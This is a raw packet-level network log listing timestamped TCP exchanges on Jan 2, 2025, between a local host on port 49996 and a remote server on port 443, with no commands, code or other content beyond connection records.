Jan 2, 2025 12:15:37.553177118 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.553296089 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.553354979 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.553359985 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.553368092 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.553410053 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.553498983 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.553551912 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.557674885 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.557718992 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.557732105 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.557738066 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.557764053 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.557786942 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.563934088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.564023018 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.564038992 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.564088106 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.570693970 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.570825100 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.570868015 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.570880890 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.570910931 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.570930004 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.572030067 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.573523998 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.573561907 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.573581934 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.573587894 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.573610067 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.573632956 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585292101 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585356951 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585382938 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585393906 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585421085 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585438013 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585441113 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585447073 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585490942 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585640907 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585671902 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585689068 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585695028 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585706949 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.585717916 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585742950 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.585748911 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.591612101 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.591639996 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.591660976 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.591671944 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.591686964 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.591712952 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.595000982 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.602121115 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.602173090 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.602224112 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.602272034 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.606420040 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.606455088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.606478930 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.606487989 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.606513023 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.606534958 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.614900112 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.614959955 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.620696068 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.633224964 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.633260012 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.633282900 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.633296013 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.633333921 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.633343935 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.643289089 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.643362045 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.643364906 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.643374920 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.643420935 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.643527985 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.643582106 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.643703938 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.643757105 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.643971920 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.644023895 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.644064903 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.644115925 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.644315958 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.644345999 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.644367933 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.644375086 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.644390106 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.644422054 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.645479918 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.648410082 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.648473978 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.648544073 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.648598909 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.654887915 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.654958010 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.654961109 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.654968977 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.655004978 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.661658049 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.661721945 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.661809921 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.661858082 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.664344072 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.664397001 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.664535046 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.664585114 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.669276953 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.669344902 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.669393063 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.669447899 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.672063112 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.672121048 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.672136068 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.672184944 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.675822973 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.675879955 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.675928116 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.675991058 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.690733910 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.690778017 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.690824986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.690835953 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.690850019 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.690885067 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.693592072 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.693660975 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.693784952 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.693840027 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.695885897 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.697297096 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.697369099 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.697418928 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.697468042 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.705657005 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.705749035 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.705889940 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.705905914 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.711853981 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.724205017 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.724267960 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.724390984 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.724390984 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.724401951 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.726438046 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.734328985 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.734410048 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.734467030 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.734520912 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.734639883 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.734694958 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.734711885 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.734740019 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.734771967 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.734778881 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.734791994 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.734841108 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.734884024 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.734929085 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.735205889 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.735265970 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.735279083 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.735308886 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.735333920 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.735347033 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.739459991 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.739500046 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.739512920 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.739521027 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.739543915 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.739552021 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.745800972 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.745882034 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.745970011 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.746018887 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.751703978 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.752696991 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.752751112 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.752783060 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.752835989 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.755399942 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.755453110 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.755517006 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.755564928 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.760263920 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.760315895 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.760390043 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.760445118 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.763060093 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.763113976 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.763181925 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.763247013 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.766763926 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.766798973 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.766822100 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.766839027 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.766851902 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.766884089 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.781651974 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.781711102 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.781718016 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.781732082 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.781768084 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.784706116 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.784749031 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.784775972 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.784786940 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.784801006 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.784828901 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.788317919 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.788367033 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.788443089 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.788489103 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.796736956 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.796813965 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.796842098 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.796892881 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.807847023 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.815367937 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.815427065 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.815506935 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.815557003 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.825258970 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.825309992 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.825403929 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.825448990 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.825572968 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.825620890 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.825714111 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.825761080 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.825956106 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.826009989 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.826013088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.826020956 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.826056957 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.826069117 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.826293945 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.826338053 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.826390982 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.826431036 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.830398083 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.830473900 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.830511093 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.830555916 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.836802959 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.836874008 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.836987972 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.837044954 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.843689919 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.843765974 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.843816042 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.843873024 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.846334934 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.846389055 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.846545935 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.846600056 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.851286888 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.851341009 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.851386070 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.851433039 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.853979111 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.854052067 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.854084969 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.854134083 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.857669115 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.857726097 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.857812881 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.857870102 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.868331909 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.872544050 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.872617960 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.872657061 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.872709036 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.875726938 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.875778913 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.875871897 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.875917912 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.879244089 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.879292965 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.879435062 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.879499912 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.887788057 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.887847900 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.887851000 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.887860060 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.887903929 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.906351089 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.906477928 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.906490088 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.906517982 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.906544924 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.906563997 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.916332006 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.916382074 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.916445971 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.916472912 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.916485071 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.916531086 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.916600943 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.916608095 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.916654110 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.916743994 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.916796923 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.916814089 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.916863918 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.917049885 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.917099953 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.917308092 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.917360067 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.917432070 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.917486906 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.921436071 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.921494961 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.921519995 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.921572924 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.927792072 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.927851915 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.927946091 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.928009987 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.934741974 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.934803963 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.934847116 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.934894085 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.937289000 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.937433004 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.937438965 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.937447071 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.937490940 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.942292929 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.942367077 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.942477942 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.942528963 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.945071936 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.945164919 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.945213079 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.945219040 CET	443	49996	118.178.60.9	192.168.2.6
